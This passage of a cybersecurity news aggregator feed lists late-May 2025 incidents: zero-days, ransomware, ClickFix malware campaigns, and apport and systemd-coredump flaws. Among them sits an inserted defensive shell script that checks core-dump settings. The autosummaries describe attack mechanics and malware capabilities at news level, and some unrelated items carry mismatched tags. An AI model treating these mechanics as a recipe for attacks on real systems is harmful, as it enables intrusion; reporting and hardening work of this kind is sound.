Qualcomm has shipped security updates to address three zero-day vulnerabilities that it said have been exploited in limited, targeted attacks in the wild. The flaws in question, which were responsibly disclosed to the company by the Google Android Security team, are listed below - CVE-2025-21479 and CVE-2025-21480 (CVSS score: 8.6) - Two incorrect authorization vulnerabilities in the Graphics "

Autosummary: "


Qualcomm fixed three zero-days exploited in limited, targeted attacks

exploits
2025-06-02 https://securityaffairs.com/178532/hacking/qualcomm-fixed-three-zero-days-exploited-in-limited-targeted-attacks.html
Qualcomm addressed three zero-day vulnerabilities that, according to the company, have been exploited in limited, targeted attacks in the wild. Qualcomm has shipped security updates to address three zero-day vulnerabilities that it said have been exploited in limited, targeted attacks in the wild. Google Android Security team reported the three issues, tracked as CVE-2025-21479, CVE-2025-21480, […] "

Autosummary: By Pierluigi Paganini, June 02, 2025. Qualcomm addressed three zero-day vulnerabilities that, according to the company, have been exploited in limited, targeted attacks in the wild. "


A cyberattack hit hospitals operated by Covenant Health

ciber
2025-06-02 https://securityaffairs.com/178507/cyber-crime/a-cyberattack-hit-hospitals-operated-by-covenant-health.html
A cyberattack hit three hospitals operated by Covenant Health, forcing them to shut down all systems to contain the incident. Three hospitals run by Covenant Health were hit by a cyberattack, prompting them to shut down all their systems to contain the security incident. “St. Mary’s is currently experiencing a temporary system issue that is […] "

Autosummary: By Pierluigi Paganini, June 02, 2025. A cyberattack hit three hospitals operated by Covenant Health, forcing them to shut down all systems to contain the incident. "


Google Chrome to distrust Chunghwa Telecom, Netlock certificates in August

Telcos
2025-06-02 https://www.bleepingcomputer.com/news/security/google-chrome-to-distrust-chunghwa-telecom-netlock-certificates-in-august/
Google says it will no longer trust the root CA certificates of Chunghwa Telecom and Netlock in the Chrome Root Store due to a pattern of compliance failures and failure to make improvements. [...] "

Autosummary: Netlock is a significant Hungarian provider of digital certification services (electronic signatures, timestamping, and TLS/SSL certificates), best known for its Arany (Gold Class) Root CA, which is widely used in Hungary and other European countries. "


Cartier discloses data breach amid fashion brand cyberattacks

financial ciber
2025-06-02 https://www.bleepingcomputer.com/news/security/cartier-discloses-data-breach-amid-fashion-brand-cyberattacks/
Luxury fashion brand Cartier is warning customers it suffered a data breach that exposed customers' personal information after its systems were compromised. [...] "

Autosummary: In May, Dior disclosed a data breach after threat actors breached its systems and stole customer contact details, purchase histories, and preferences. "


Don’t let dormant accounts become a doorway for cybercriminals

ciber
2025-06-02 https://www.welivesecurity.com/en/cybersecurity/dont-let-dormant-accounts-become-doorway-cybercriminals/
Do you have online accounts you haven't used in years? If so, a bit of digital spring cleaning might be in order. "

Autosummary: One report claims that 3.2 billion credentials were stolen last year, most (75%) via infostealers. Stolen credentials also come from large-scale data breaches, where hackers harvest entire databases of passwords and usernames from third-party companies you might have signed up to; credential stuffing, where hackers feed breached credentials into automated software in an attempt to unlock accounts where you've reused that same compromised password; and brute-force techniques, where they use trial and error to guess your passwords. The consequences of inactive accounts: if an attacker gains access to your account, they could use it to send spam and scams to your contacts (e.g., if it's an inactive email or social media account), or even launch convincing phishing attacks in your name. For those accounts you want to keep, aside from updating the password to a strong, unique credential and storing it in a password manager, consider switching on two-factor authentication (2FA), so that even if a hacker gets hold of your password, they won't be able to compromise your account. A good way to find these accounts is to search your email inbox for keywords like "Welcome," "Verify account," "Free trial," "Thank you for signing up," "Validate your account," etc. "


Turning used cooking oil into soap in a country where deep-fried foods rule

government industry
2025-06-01 https://www.bbc.com/news/articles/c9djx7llj44o
A group of young environmentalists in Honduras are turning used cooking oil into soap and dog food. "

Autosummary: "Next to our plant that produces the soap and dog food, someone else has a water purification plant and we use the water that plant cannot purify, its waste so to say, for our water cooling system," he explains. Fritz Pinnow, Reporter, Comayagua, Honduras. Hugo Daniel Chávez is proud of the soap his team makes from recycled cooking oil. Few 27-year-olds look at used cooking oil and see a green business opportunity to produce soap or dog food. "


SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 47

exploits
2025-06-01 https://securityaffairs.com/178474/malware/security-affairs-malware-newsletter-round-47.html
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: 60 Malicious npm Packages Leak Network and Host Data in Active Malware Campaign; Russia-Aligned TAG-110 Targets Tajikistan with Macro-Enabled Word Documents; Inside a VenomRAT Malware Campaign; Fake Google Meet Page Tricks Users into Running PowerShell Malware […] "

Autosummary: "


New Linux Flaws Allow Password Hash Theft via Core Dumps in Ubuntu, RHEL, Fedora

Linux
2025-05-31 https://thehackernews.com/2025/05/new-linux-flaws-allow-password-hash.html
Two information disclosure flaws have been identified in apport and systemd-coredump, the core dump handlers in Ubuntu, Red Hat Enterprise Linux, and Fedora, according to the Qualys Threat Research Unit (TRU). Tracked as CVE-2025-5054 and CVE-2025-4598, both vulnerabilities are race condition bugs that could enable a local attacker to obtain access to sensitive information. Tools like "

Autosummary: A race condition in systemd-coredump that allows an attacker to force a SUID process to crash and replace it with a non-SUID binary to access the original's privileged process core dump, allowing the attacker to read sensitive data, such as /etc/shadow content, loaded by the original process. SUID, short for Set User ID, is a special file permission that allows a user to execute a program with the privileges of its owner, rather than their own permissions. "


Two Linux flaws can lead to the disclosure of sensitive data

Linux
2025-05-31 https://securityaffairs.com/178464/hacking/two-linux-flaws-can-lead-to-the-disclosure-of-sensitive-data.html
Qualys warns of two information disclosure flaws in apport and systemd-coredump, the core dump handlers in Ubuntu, Red Hat Enterprise Linux, and Fedora distros. Researchers discovered a vulnerability in Apport (Ubuntu’s core dump handler) and another bug in systemd-coredump, which is used in the default configuration of Red Hat Enterprise Linux 9 and the Fedora distribution. systemd-coredump automatically captures “core […] "

Autosummary: The first (CVE-2025-5054) affects Ubuntu’s core-dump handler, Apport, and the second (CVE-2025-4598) targets systemd-coredump, which is the default core-dump handler on Red Hat Enterprise Linux 9 and the recently released 10, as well as on Fedora. "
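Both core-dump handler bugs above (CVE-2025-5054 in apport, CVE-2025-4598 in systemd-coredump) share one precondition: the kernel has to be willing to hand a crashed setuid process's core to the pipe handler at all, which is governed by the `fs.suid_dumpable` sysctl. Qualys' published workaround for both, until fixed packages are installed, is to set that sysctl to 0, which disables core dumps for setuid processes entirely. The script below is an added example, not taken from the Qualys advisory or from either project: it classifies the sysctl value, identifies which handler `kernel.core_pattern` pipes dumps to, and `audit_live` applies both checks to the running kernel. The core_pattern strings in the comments are the stock apport and systemd-coredump forms; the exact flags on a given distro may differ.

```shell
#!/bin/sh
# Added example: check whether setuid core dumps can reach a pipe handler.
# Mitigation for both bugs is fs.suid_dumpable=0 (loses SUID core dumps).

# suid_dumpable_verdict VALUE -> prints SAFE, RISKY or UNKNOWN
#   0: setuid processes never dump core (the workaround).
#   1: "debug" mode, core dumped like any other process, owned by the user.
#   2: "suidsafe", core only written to an absolute path or a pipe handler;
#      the handler (apport, systemd-coredump) is what the races target.
suid_dumpable_verdict() {
  case "$1" in
    0)   echo SAFE ;;
    1|2) echo RISKY ;;
    *)   echo UNKNOWN ;;
  esac
}

# core_handler CORE_PATTERN -> names the handler core_pattern points at.
# Typical pipe patterns look like:
#   |/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -- %E
#   |/usr/lib/systemd/systemd-coredump %P %u %g %s %t %c %h
core_handler() {
  case "$1" in
    "|"*apport*)          echo apport ;;
    "|"*systemd-coredump*) echo systemd-coredump ;;
    "|"*)                 echo other-pipe-handler ;;
    *)                    echo file ;;
  esac
}

# audit_live: read the running kernel's values; exit 0 only if SAFE.
audit_live() {
  val=$(cat /proc/sys/fs/suid_dumpable 2>/dev/null || echo unknown)
  pat=$(cat /proc/sys/kernel/core_pattern 2>/dev/null || echo unknown)
  verdict=$(suid_dumpable_verdict "$val")
  echo "fs.suid_dumpable=$val ($verdict), core handler: $(core_handler "$pat")"
  if [ "$verdict" != SAFE ]; then
    echo "workaround: sysctl -w fs.suid_dumpable=0 and persist it in /etc/sysctl.d/"
    return 1
  fi
  return 0
}

# Stand-alone run against the live system only when asked for explicitly.
case "${1:-}" in
  --live) audit_live ;;
esac
```

Run it with `--live` on a host; a non-zero exit means a setuid crash on that machine would still be routed to the dump handler. Note that 0 is a real trade-off: apport and systemd-coredump will no longer capture crashes of setuid binaries for debugging, so revert once the patched handler packages are in place.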


Exploit details for max severity Cisco IOS XE flaw now public

exploits
2025-05-31 https://www.bleepingcomputer.com/news/security/exploit-details-for-max-severity-cisco-ios-xe-flaw-now-public/
Technical details about a maximum-severity Cisco IOS XE WLC arbitrary file upload flaw tracked as CVE-2025-20188 have been made publicly available, bringing us closer to a working exploit. [...] "

Autosummary: "


Using AI to outsmart AI-driven phishing scams

financial
2025-05-30 https://www.helpnetsecurity.com/2025/05/30/ai-phishing-defense/

Phishing scams used to be filled with awkward wording and obvious grammar mistakes. Not anymore. AI is now making it harder to distinguish what is real. According to Cofense, email-based scams surged 70% year over year, driven by AI’s ability to automate lures, spoof internal conversations, and bypass spam filters with subtle text variations. Criminals use AI algorithms to analyze large amounts of data to understand the interests, behavior, and preferences of their target. For … More

The post Using AI to outsmart AI-driven phishing scams appeared first on Help Net Security.

"

Autosummary: According to Cofense, email-based scams surged 70% year over year, driven by AI’s ability to automate lures, spoof internal conversations, and bypass spam filters with subtle text variations. Privacy concerns: AI systems that detect phishing often analyze emails, messages, attachments, and user behavior. "


ConnectWise Hit by Cyberattack; Nation-State Actor Suspected in Targeted Breach

government ciber
2025-05-30 https://thehackernews.com/2025/05/connectwise-hit-by-cyberattack-nation.html
ConnectWise, the developer of remote access and support software ScreenConnect, has disclosed that it was the victim of a cyber attack that it said was likely perpetrated by a nation-state threat actor. "ConnectWise recently learned of suspicious activity within our environment that we believe was tied to a sophisticated nation-state actor, which affected a very small number of ScreenConnect "

Autosummary: "


Interlock ransomware: what you need to know

exploits ransomware
2025-05-30 https://www.tripwire.com/state-of-security/interlock-ransomware-what-you-need-know
"We don’t just want payment; we want accountability." The malicious hackers behind the Interlock ransomware try to justify their attacks. Learn more about what you need to know about Interlock in my article on the Tripwire State of Security blog. "

Autosummary: In October last year, the US Government warned internet users to be vigilant of the ClickFix threat, giving the example of websites that impersonated Google, Facebook, reCAPTCHA, and others. Yes, as is so normal with cyber attacks these days, the malicious hackers will leave an extortion note on your system, telling you that you will need to pay a ransom for the decryption key that will unlock the encrypted files, and also to prevent the files from being published on the dark web. Recommended defences include using hard-to-crack unique passwords to protect sensitive data and accounts, as well as enabling multi-factor authentication. "


China-Linked Hackers Exploit SAP and SQL Server Flaws in Attacks Across Asia and Brazil

exploits latam
2025-05-30 https://thehackernews.com/2025/05/china-linked-hackers-exploit-sap-and.html
The China-linked threat actor behind the recent in-the-wild exploitation of a critical security flaw in SAP NetWeaver has been attributed to a broader set of attacks targeting organizations in Brazil, India, and Southeast Asia since 2023. "The threat actor mainly targets the SQL injection vulnerabilities discovered on web applications to access the SQL servers of targeted organizations," Trend "

Autosummary: remote code execution vulnerability; CVE-2021-22205 - GitLab remote code execution vulnerability; CVE-2024-9047 - WordPress File Upload plugin arbitrary file access vulnerability; CVE-2024-27198 - JetBrains TeamCity authentication bypass vulnerability; CVE-2024-27199 - JetBrains TeamCity path traversal vulnerability; CVE-2024-51378 - CyberPanel remote code execution vulnerability; CVE-2024-51567 - CyberPanel remote code execution vulnerability; CVE-2024-56145 - Craft CMS remote code execution vulnerability. Describing it as "highly active," Trend Micro noted that the threat actor has shifted its focus from financial services to logistics and online retail, and most recently, to IT companies, universities, and government organizations. "


U.S. Sanctions Funnull for $200M Romance Baiting Scams Tied to Crypto Fraud

financial
2025-05-30 https://thehackernews.com/2025/05/us-sanctions-funnull-for-200m-romance.html
The U.S. Department of Treasury's Office of Foreign Assets Control (OFAC) has levied sanctions against a Philippines-based company named Funnull Technology Inc. and its administrator Liu Lizhi for providing infrastructure to conduct romance baiting scams that led to massive cryptocurrency losses. The Treasury accused the Taguig-headquartered company of enabling thousands of websites involved in "

Autosummary: Funnull, also called Fang Neng CDN (funnull[.]io, funnull[.]com, funnull[.]app, and funnull[.]buzz), first attracted the attention of the cybersecurity community in June 2024 after it was implicated in the supply chain attack on the widely used Polyfill[.]io JavaScript library. "


US Treasury sanctioned the firm Funnull Technology as major cyber scam facilitator

financial
2025-05-30 https://securityaffairs.com/178450/cyber-crime/us-treasury-sanctioned-the-firm-funnull-technology.html
The U.S. sanctioned Funnull Technology and Liu Lizhi for aiding romance scams that caused major crypto losses through fraud infrastructure. The U.S. Department of Treasury’s Office of Foreign Assets Control (OFAC) sanctioned Philippines-based company Funnull Technology Inc. and its admin Liu Lizhi for enabling romance scams, causing $200M in U.S. victim losses. A romance scam […] "

Autosummary: “Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned Funnull Technology Inc., a Philippines-based company that provides computer infrastructure for hundreds of thousands of websites involved in virtual currency investment scams, commonly known as “pig butchering,” along with its administrator, Liu Lizhi.” "


ConnectWise suffered a cyberattack carried out by a sophisticated nation state actor

government ciber
2025-05-30 https://securityaffairs.com/178442/hacking/connectwise-cyberattack-sophisticated-nation-state-actor.html
ConnectWise detected suspicious activity linked to a nation-state actor, impacting a small number of its ScreenConnect customers. ConnectWise revealed it had detected suspicious activity linked to an advanced nation-state actor. The company confirmed that the attack impacted a small number of its ScreenConnect customers. “ConnectWise recently learned of suspicious activity within our environment that we […] "

Autosummary: By Pierluigi Paganini, May 30, 2025. ConnectWise is a Florida-based software company that provides IT management solutions, including Remote Monitoring and Management (RMM), cybersecurity tools, automation software, and business management platforms. "


Football and other premium TV being pirated at "industrial scale"

industry
2025-05-30 https://www.bbc.com/news/articles/cp3n7dx2174o
New research singles out the Amazon Fire Stick as the most popular means of accessing illegal streams. "

Autosummary: (Image: Getty Images) Liverpool won the English Premier League this season, and live football is the focus of many illegal streams. A lack of action by big tech firms is enabling the "industrial scale theft" of premium video services, especially live sport, a new report says. "


Germany doxxes Conti ransomware and TrickBot ring leader

exploits ransomware
2025-05-30 https://www.bleepingcomputer.com/news/security/germany-doxxes-conti-ransomware-and-trickbot-ring-leader/
The Federal Criminal Police Office of Germany (Bundeskriminalamt or BKA) claims that Stern, the leader of the Trickbot and Conti cybercrime gangs, is a 36-year-old Russian named Vitaly Nikolaevich Kovalev. [...] "

Autosummary: The leaks ultimately expedited Conti's shutdown, with the cybercrime members moving to other operations or starting new gangs, including Royal, Black Basta, BlackCat, AvosLocker, Karakurt, LockBit, Silent Ransom, DagonLocker, and ZEON. "


Damascened Peacock: Russian hackers targeted UK Ministry of Defence

rusia-ucrania
2025-05-30 https://www.bitdefender.com/en-us/blog/hotforsecurity/damascened-peacock-russian-hackers-targeted-uk-ministry-of-defence
The UK’s Ministry of Defence has revealed that it was the target of a sophisticated cyber attack that saw Russia-linked hackers pose as journalists. Read more in my article on the Hot for Security blog. "

Autosummary: "


New EDDIESTEALER Malware Bypasses Chrome's App-Bound Encryption to Steal Browser Data

exploits
2025-05-30 https://thehackernews.com/2025/05/eddiestealer-malware-uses-clickfix.html
A new malware campaign is distributing a novel Rust-based information stealer dubbed EDDIESTEALER using the popular ClickFix social engineering tactic initiated via fake CAPTCHA verification pages. "This campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script, which ultimately deploys the infostealer, harvesting sensitive data such as "

Autosummary: The disclosure comes as c/side revealed details of a ClickFix campaign that targets multiple platforms, such as Apple macOS, Android, and iOS, using techniques like browser-based redirections, fake UI prompts, and drive-by download techniques. AppleProcessHub Stealer, on the other hand, is designed to exfiltrate user files including bash history, zsh history, GitHub configurations, SSH information, and iCloud Keychain. "


Hackers are exploiting critical flaw in vBulletin forum software

exploits
2025-05-30 https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-flaw-in-vbulletin-forum-software/
Two critical vulnerabilities affecting the open-source forum software vBulletin have been discovered, with one confirmed to be actively exploited in the wild. [...] "

Autosummary: The flaws, tracked as CVE-2025-48827 and CVE-2025-48828 and rated critical (CVSS v3 scores of 10.0 and 9.0, respectively), are an API method invocation flaw and a remote code execution (RCE) flaw via template engine abuse. "


Police takes down AVCheck site used by cybercriminals to scan malware

exploits ciber
2025-05-30 https://www.bleepingcomputer.com/news/security/police-takes-down-avcheck-antivirus-site-used-by-cybercriminals/
An international law enforcement operation has taken down AVCheck, a service used by cybercriminals to test whether their malware is detected by commercial antivirus software before deploying it in the wild. [...] "

Autosummary: "By leveraging counter antivirus services, malicious actors refine their weapons against the world's toughest security systems to better slip past firewalls, evade forensic analysis, and wreak havoc across victims' systems. "


Elon Musk leaves White House but says Doge will continue

ransomware
2025-05-29 https://www.bbc.com/news/articles/cz9y4exj822o
Musk's exit comes after he criticised the legislative centrepiece of the president's agenda. "

Autosummary: Christal Hayes and Brandon Drenon, BBC News. Watch: Elon Musk says he is "disappointed" with Trump's "big, beautiful bill", in interview with CBS Sunday Morning. Elon Musk has said he is leaving the Trump administration after helping lead a tumultuous drive to shrink the size of US government that saw thousands of federal jobs axed. "


Resecurity Compliance Manager empowers cybersecurity leaders with AI-driven insights

ciber
2025-05-29 https://www.helpnetsecurity.com/2025/05/29/resecurity-compliance-manager/

Resecurity has officially launched its AI-driven Compliance Manager. The solution is engineered to help CISOs and compliance teams manage complex regulatory demands, reduce risk, and maintain alignment with global cybersecurity standards. The Compliance Manager delivers centralized visibility, automation, and expert-level guidance to ensure organizations stay audit-ready and resilient in the face of expanding data protection and information security regulations. The platform currently supports over 20 international and regional compliance frameworks, including: GDPR (General Data Protection … More

The post Resecurity Compliance Manager empowers cybersecurity leaders with AI-driven insights appeared first on Help Net Security.

"

Autosummary: "


What CISOs can learn from the frontlines of fintech cybersecurity

ciber
2025-05-29 https://www.helpnetsecurity.com/2025/05/29/ria-shetty-mastercard-cybersecurity-innovation/

At Span Cyber Security Arena, I sat down with Ria Shetty, Director, Cyber Security & Resilience for Europe at Mastercard. Our conversation cut through the hype and focused on what CISOs deal with every day: how to embed security into innovation, manage supply chain risk, and prepare both systems and people for the threats ahead. For Shetty, the idea that innovation competes with security is a false choice. “They go hand in hand,” she says. … More

The post What CISOs can learn from the frontlines of fintech cybersecurity appeared first on Help Net Security.

"

Autosummary: Her team works with banks, merchants, and partners to raise awareness, provide tools, and help them secure their full environment. “Protection on the payment side is great, but if a customer is compromised elsewhere in their environment, that becomes our problem too,” she says. “You can have the smartest tool out there, but in the end, it depends on the human,” she says.Her team can provide tools and guidance, but success depends on how organizations handle their people, processes, and partners.That’s why transparency, privacy, and security are built into every step of her team’s work, not added at the end. "


CISOs prioritize AI-driven automation to optimize cybersecurity spending

ciber
2025-05-29 https://www.helpnetsecurity.com/2025/05/29/ai-automation-investing/

Cybersecurity leaders and consultants identified AI-driven automation and cost optimization as top organizational priorities, according to Wipro. 30% of respondents are investing in AI automation to enhance their cybersecurity operations. AI-driven automation can help in detecting and responding to threats more quickly and accurately, thereby reducing the need for extensive manual intervention. 26% of respondents are focusing on tools rationalization. This approach involves evaluating and consolidating duplicate security tools across platforms to eliminate redundancies and … More

The post CISOs prioritize AI-driven automation to optimize cybersecurity spending appeared first on Help Net Security.

"

Autosummary: Some organizations are transitioning cybersecurity into a business-risk-aligned management structure to enhance accountability at the board level, promote risk-aware behavior throughout the organization, and strengthen the case for necessary cybersecurity investments. "


Review: Cybersecurity For Dummies, 3rd Edition

ciber
2025-05-29 https://www.helpnetsecurity.com/2025/05/29/review-cybersecurity-for-dummies-3rd-edition/

If you’re new to cybersecurity and looking for a book that doesn’t overwhelm you with jargon or dive too deep into technical territory, Cybersecurity For Dummies might be a solid starting point. It’s written with beginners in mind and assumes you know how to use a smartphone and computer but not much more. This latest edition, published in 2025, adds newer topics like AI threats, which help keep the material relevant. About the author Joseph … More

The post Review: Cybersecurity For Dummies, 3rd Edition appeared first on Help Net Security.

"

Autosummary: The book covers personal safety tips for passwords, accounts, and devices; risks of public Wi-Fi and social engineering; security for small businesses and remote workers; how to respond if you're hacked; backing up and restoring your data; careers in cybersecurity; and what's coming next, such as AI, smart devices, and more. There are even chapters at the end that give "top ten" lists of practical advice. About the author: Joseph Steinberg holds a suite of security certifications including CISSP, ISSAP, ISSMP, and CSSLP. "


Chinese APT41 Exploits Google Calendar for Malware Command-and-Control Operations

exploits
2025-05-29 https://thehackernews.com/2025/05/chinese-apt41-exploits-google-calendar.html
Google on Wednesday disclosed that the Chinese state-sponsored threat actor known as APT41 leveraged a malware called TOUGHPROGRESS that uses Google Calendar for command-and-control (C2). The tech giant, which discovered the activity in late October 2024, said the malware was hosted on a compromised government website and was used to target multiple other government entities. "Misuse of cloud "

Autosummary: APT41, also tracked as Axiom, Blackfly, Brass Typhoon (formerly Barium), Bronze Atlas, Earth Baku, HOODOO, Red Kelpie, TA415, Wicked Panda, and Winnti, is the name assigned to a prolific nation-state group known for its targeting of governments and organizations within the global shipping and logistics, media and entertainment, technology, and automotive sectors. "


Over 100,000 WordPress Sites at Risk from Critical CVSS 10.0 Vulnerability in Wishlist Plugin

exploits
2025-05-29 https://thehackernews.com/2025/05/over-100000-wordpress-sites-at-risk.html
Cybersecurity researchers have disclosed a critical unpatched security flaw impacting TI WooCommerce Wishlist plugin for WordPress that could be exploited by unauthenticated attackers to upload arbitrary files. TI WooCommerce Wishlist, which has over 100,000 active installations, is a tool to allow e-commerce site customers to save their favorite products for later and share the lists on social "

Autosummary: "


Data broker LexisNexis discloses data breach affecting 364,000 people

financial
2025-05-29 https://www.bleepingcomputer.com/news/security/data-broker-lexisnexis-discloses-data-breach-affecting-364-000-people/
Data broker giant LexisNexis Risk Solutions has revealed that unknown attackers stole the personal information of over 364,000 individuals in a December breach. [...] "

Autosummary: "The personal information involved was limited to name, contact information (such as phone number, postal or email address), Social Security number, driver’s license number or date of birth," the spokesperson also told BleepingComputer. "


DragonForce Exploits SimpleHelp Flaws to Deploy Ransomware Across Customer Endpoints

exploits ransomware
2025-05-29 https://thehackernews.com/2025/05/dragonforce-exploits-simplehelp-flaws.html
The threat actors behind the DragonForce ransomware gained access to an unnamed Managed Service Provider's (MSP) SimpleHelp remote monitoring and management (RMM) tool, and then leveraged it to exfiltrate data and drop the locker on multiple endpoints. It's believed that the attackers exploited a trio of security flaws in SimpleHelp (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) that were "

Autosummary: Sophos said while the ransomware attack was ultimately thwarted, the attackers managed to steal data and dwell on the network for nine days before attempting to launch the locker. "The combination of vishing and email bombing continues to be a potent, effective combination for ransomware attackers – and the 3AM ransomware group has now found a way to take advantage of remote encryption to stay out of sight of traditional security software," Sean Gallagher, principal threat researcher at Sophos, said. "DragonForce is not just another ransomware brand – it's a destabilizing force trying to reshape the ransomware landscape," Aiden Sinnott, senior threat researcher at Sophos Counter Threat Unit, said. "


US sanctions firm linked to cyber scams behind $200 million in losses

financial
2025-05-29 https://www.bleepingcomputer.com/news/security/us-sanctions-company-linked-to-hundreds-of-thousands-of-cyber-scam-sites/
The U.S. Treasury Department has sanctioned Funnull Technology, a Philippines-based company that supports hundreds of thousands of malicious websites behind cyber scams linked to over $200 million in losses for Americans. [...] "

Autosummary: As the FBI revealed last month, cybercriminals stole a record $16.6 billion from Americans in 2024, with over $6.5 billion lost to investment scams, marking a massive increase in losses of over 33% compared to the previous year. "


Cybercriminals exploit AI hype to spread ransomware, malware

exploits ransomware ciber
2025-05-29 https://www.bleepingcomputer.com/news/security/cybercriminals-exploit-ai-hype-to-spread-ransomware-malware/
Threat actors linked to lesser-known ransomware and malware projects now use AI tools as lures to infect unsuspecting victims with malicious payloads. [...]

Autosummary: The ransom note demands a $50,000 ransom to be paid in the hard-to-trace Monero cryptocurrency, claiming that the funds will support humanitarian causes in Palestine, Ukraine, Africa, and Asia.


Take back control of your browser—Malwarebytes Browser Guard now blocks search hijacking attempts

exploits
2025-05-29 https://www.malwarebytes.com/blog/product/2025/05/take-back-control-of-your-browsermalwarebytes-browser-guard-will-now-block-search-hijacking-attempts
Malwarebytes Browser Guard has a cool new feature to protect you against search hijacking.



Victoria’s Secret ‘s website offline following a cyberattack

ciber
2025-05-29 https://securityaffairs.com/178432/hacking/victorias-secrets-website-offline-following-a-cyberattack.html
Victoria’s Secret took its website offline after a cyberattack, with experts warning of rising threats against major retailers. American lingerie, clothing, and beauty retailer Victoria’s Secret took its website offline following a cyberattack. At this time, the site shows the following message: “Valued customer, we identified and are taking steps to address a security incident. […]

Autosummary: Victoria’s Secret took its website offline after a cyberattack, with experts warning of rising threats against major retailers.


China-linked APT41 used Google Calendar as C2 to control its TOUGHPROGRESS malware

exploits
2025-05-29 https://securityaffairs.com/178424/apt/china-linked-apt41-used-google-calendar-as-c2-to-control-its-toughprogress-malware.html
Google says China-linked group APT41 controlled malware via Google Calendar to target governments through a hacked site. Google warns that China-linked APT41 used TOUGHPROGRESS malware with Google Calendar as C2, targeting various government entities via a compromised website. “In late October 2024, GTIG discovered an exploited government website hosting malware being used to target multiple […]

Autosummary: This DLL uses advanced control flow obfuscation techniques, like register-based indirect calls, dynamic address arithmetic, 64-bit register overflow, and function dispatch tables, to hide its behavior.


ConnectWise breached in cyberattack linked to nation-state hackers

government ciber
2025-05-29 https://www.bleepingcomputer.com/news/security/connectwise-breached-in-cyberattack-linked-to-nation-state-hackers/
IT management software firm ConnectWise says a suspected state-sponsored cyberattack breached its environment and impacted a limited number of ScreenConnect customers. [...]

Autosummary: ConnectWise is a Florida-based software company that provides IT management, RMM (remote monitoring and management), cybersecurity, and automation solutions for managed service providers (MSPs) and IT departments.


Threat actors abuse Google Apps Script in evasive phishing attacks

financial
2025-05-29 https://www.bleepingcomputer.com/news/security/threat-actors-abuse-google-apps-script-in-evasive-phishing-attacks/
Threat actors are abusing the trusted Google platform "Google Apps Script" to host phishing pages, making them appear legitimate and eliminating the risk of them getting flagged by security tools. [...]

Autosummary: Google Apps Script is a JavaScript-based cloud scripting platform from Google that allows users to automate tasks and extend the functionality of Google Workspace products like Google Sheets, Docs, Drive, Gmail, and Calendar.


Cybercriminals Target AI Users with Malware-Loaded Installers Posing as Popular Tools

exploits ciber
2025-05-29 https://thehackernews.com/2025/05/cybercriminals-target-ai-users-with.html
Fake installers for popular artificial intelligence (AI) tools like OpenAI ChatGPT and InVideo AI are being used as lures to propagate various threats, such as the CyberLock and Lucky_Gh0$t ransomware families, and a new malware dubbed Numero. "CyberLock ransomware, developed using PowerShell, primarily focuses on encrypting specific files on the victim's system," Cisco Talos researcher Chetan

Autosummary: The three malware families are below:
- GRIMPULL, a downloader that uses a TOR tunnel to fetch additional .NET payloads that are decrypted, decompressed, and loaded into memory as .NET assemblies
- FROSTRIFT, a .NET backdoor that collects system information, details about installed applications, and scans for 48 extensions related to password managers, authenticators, and cryptocurrency wallets on Chromium-based web browsers
- XWorm, a known .NET-based remote access trojan (RAT) with features like keylogging, command execution, screen capture, information gathering, and victim notification via Telegram
STARKVEIL also serves as a conduit to launch a Python-based dropper codenamed COILHATCH that's actually tasked with running the aforementioned three payloads via DLL side-loading. The ransomware is equipped to escalate privileges and re-execute itself with administrative permissions, if not already, and encrypts files located in the partitions "C:\," "D:\," and "E:\" that match a certain set of extensions.


US green energy firms brace for federal funding cuts

industry
2025-05-29 https://www.bbc.com/news/articles/clynkqw236po
Billions of dollars of US federal funding for green energy projects hangs in the balance.

Autosummary: Meanwhile, the fate of the IRA, which the Congress has the power to amend or repeal along with the IIJA, is being decided, in part, by the budget bill, which aims to permanently extend President Trump's first term tax cuts by making savings elsewhere. Meanwhile, actual clean energy investment in the US including from both government and private sources (the far larger share) dropped 3.8% in the first quarter of 2025 to $67.3bn, a second quarterly decline, according to new figures released by the Clean Investment Monitor.


GitHub becomes go-to platform for malware delivery across Europe

exploits
2025-05-28 https://www.helpnetsecurity.com/2025/05/28/attackers-phishing-method-europe/

Phishing has become the go-to method for attackers looking to get past security controls and access sensitive environments in Europe, according to Netskope. Users are now constantly dealing with phishing attempts, which have become so common and credible that even careful people can make mistakes. Adobe is the brand most commonly impersonated by cybercriminals, appearing in 29% of cloud phishing campaigns aimed at stealing credentials for digital services. Microsoft’s brand is the next most impersonated … More

The post GitHub becomes go-to platform for malware delivery across Europe appeared first on Help Net Security.


Autosummary: “No app, or app traffic, should be considered trusted, or exempted from a security policy,” said Gianpietro Cutolo, Cloud Threat Researcher at Netskope Threat Labs.


Hottest cybersecurity open-source tools of the month: May 2025

ciber
2025-05-28 https://www.helpnetsecurity.com/2025/05/28/hottest-cybersecurity-open-source-tools-of-the-month-may-2025/

This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments.
Vuls: Open-source agentless vulnerability scanner. Vuls is an open-source tool that helps users find and manage security vulnerabilities. It was created to solve the daily problems admins face when trying to keep servers secure.
LlamaFirewall: Open-source framework to detect and mitigate AI centric security risks. LlamaFirewall is a system-level security framework for LLM-powered applications, built with a … More

The post Hottest cybersecurity open-source tools of the month: May 2025 appeared first on Help Net Security.




Attackers hit MSP, use its RMM software to deliver ransomware to clients

exploits ransomware
2025-05-28 https://www.helpnetsecurity.com/2025/05/28/attackers-hit-msp-use-its-rmm-software-to-deliver-ransomware-to-clients/

A threat actor wielding the DragonForce ransomware has compromised an unnamed managed service provider (MSP) and pushed the malware onto its client organizations via SimpleHelp, a legitimate remote monitoring and management (RMM) tool. “Sophos MDR has medium confidence the threat actor exploited a chain of vulnerabilities that were released in January 2025,” the company’s incident responders shared on Tuesday. The vulnerabilities in question are CVE-2024-57727, CVE-2024-57728 and CVE-2024-57726, which can be used to compromise SimpleHelp … More

The post Attackers hit MSP, use its RMM software to deliver ransomware to clients appeared first on Help Net Security.


Autosummary: The vulnerabilities in question are CVE-2024-57727, CVE-2024-57728 and CVE-2024-57726, which can be used to compromise SimpleHelp server instances and, through them, push malicious payloads to machines with the client software installed.


Mimo Hackers Exploit CVE-2025-32432 in Craft CMS to Deploy Cryptominer and Proxyware

exploits
